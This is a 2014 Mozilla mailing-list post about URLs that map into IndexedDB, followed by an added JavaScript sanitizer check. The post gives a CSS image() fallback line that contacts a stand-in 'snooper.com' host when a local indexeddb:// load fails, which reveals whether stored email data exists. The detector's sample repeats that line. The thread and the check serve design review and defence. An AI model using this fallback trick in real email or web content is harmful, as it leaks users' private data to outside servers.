On Sat, Apr 19, 2014 at 6:31 AM, Andrew Sutherland <[email protected]> wrote:
> On 04/18/2014 08:58 PM, Jonas Sicking wrote:
>>
>> Another solution here would be if we added support for URLs that map
>> directly into indexedDB. See
>>
>> http://lists.w3.org/Archives/Public/public-webapps/2013JulSep/0081.html
>
> It seems like this could open new avenues for information leakage unless
> URLs require JS code execution to bless them into validity using a variant
> on createObjectURL or just the getURL your proposed bug magicked into
> createURL/mapURL. For example...
>
> Hypothetically, let's say I'm an email app with a predictable db schema;
> messages are stored by the uniqueish "message-id"[1] header included with
> every message and known to every recipient of that message. Let's also say
> my authors didn't care about user privacy too much so they display remote
> images/resources by default and don't bother sanitizing them for this
> reason. I, hypothetical email app, do put that HTML content in a sandboxed
> iframe that forbids script from running because I'm not completely reckless.
> But I do keep the iframe in my origin because in order for me to display
> embedded images in the e-mail which I've saved to IndexedDB as Blobs, well,
> that's what I've got to do to surface the Blobs or be able to
> manipulate/interact with the iframe's HTML DOM at all after minting the
> iframe and its document.
Even though you could link to resources in local databases, how would you
then extract data and send it to the server? Simply displaying an image from
the database could be surprising/scary to the user, but doesn't actually
extract any sensitive information.

However, I think CSS actually would allow using a fallback syntax which would
only trigger loads back to a server if a local load failed. I.e. I think
something like the following

<p style="background-image: image(url(indexeddb://...), url(http://snooper.com/...))">

will only send a request to snooper.com if the load from indexeddb failed.

There are two ways we could handle this. We could define that doing fallback
from a local url like indexeddb:// isn't allowed. This seems unfortunate as
it seems like a useful feature.

Another solution is to define that sandboxed pages with scripts disabled
can't load from local urls. At least not unless explicitly allowed by some
new sandbox flag.

/ Jonas

_______________________________________________
dev-b2g mailing list
[email protected]
https://lists.mozilla.org/listinfo/dev-b2g
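As an added example that is not part of the thread: a check an email app's HTML sanitizer could run over inline styles to catch the CSS fallback pattern Jonas describes, where a local-scheme URL is followed by a remote URL in the same image() chain. The indexeddb:// scheme is the hypothetical one from the proposal; the other schemes treated as local and the sample markup are assumptions constructed for this example.

```javascript
// Schemes whose loads never leave the device (assumption: indexeddb:// is the
// hypothetical scheme from the thread; blob/filesystem are added for illustration).
const LOCAL_SCHEMES = new Set(["indexeddb", "blob", "filesystem"]);

function schemeOf(url) {
  const m = /^([a-z][a-z0-9+.-]*):/i.exec(url.trim());
  return m ? m[1].toLowerCase() : null;
}

// Return the argument list of every image(...) in a CSS value, counting
// parentheses so nested url(...) calls stay inside the chain they belong to.
function imageArguments(cssValue) {
  const args = [];
  const lower = cssValue.toLowerCase();
  let start = lower.indexOf("image(");
  while (start !== -1) {
    let depth = 0;
    let i = start + "image".length;
    for (; i < cssValue.length; i++) {
      if (cssValue[i] === "(") depth++;
      else if (cssValue[i] === ")" && --depth === 0) break;
    }
    args.push(cssValue.slice(start + "image(".length, i));
    start = lower.indexOf("image(", i);
  }
  return args;
}

// Extract url(...) operands, in declaration order, from one image() argument list.
function urlsIn(argList) {
  const urls = [];
  const re = /url\(\s*(['"]?)([^'")]+)\1\s*\)/gi;
  let m;
  while ((m = re.exec(argList)) !== null) urls.push(m[2].trim());
  return urls;
}

// Report each local-scheme URL that a non-local URL falls back from: if the
// local load fails, the browser would fetch the remote one.
function leakyFallbacks(cssValue) {
  const findings = [];
  for (const argList of imageArguments(cssValue)) {
    const urls = urlsIn(argList);
    urls.forEach((u, idx) => {
      if (!LOCAL_SCHEMES.has(schemeOf(u))) return;
      const remote = urls.slice(idx + 1).find((v) => !LOCAL_SCHEMES.has(schemeOf(v)));
      if (remote) findings.push({ local: u, remote });
    });
  }
  return findings;
}

// Constructed sample mirroring the pattern in the thread (not real markup).
const SAMPLE =
  '<p style="background-image: image(url(indexeddb://mail/att/msg-id-123), ' +
  'url(http://snooper.com/msg-id-123))">';
```

Running leakyFallbacks(SAMPLE) yields one finding pairing the indexeddb:// URL with the snooper.com URL; a chain made only of remote URLs, or only of local ones, yields none.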
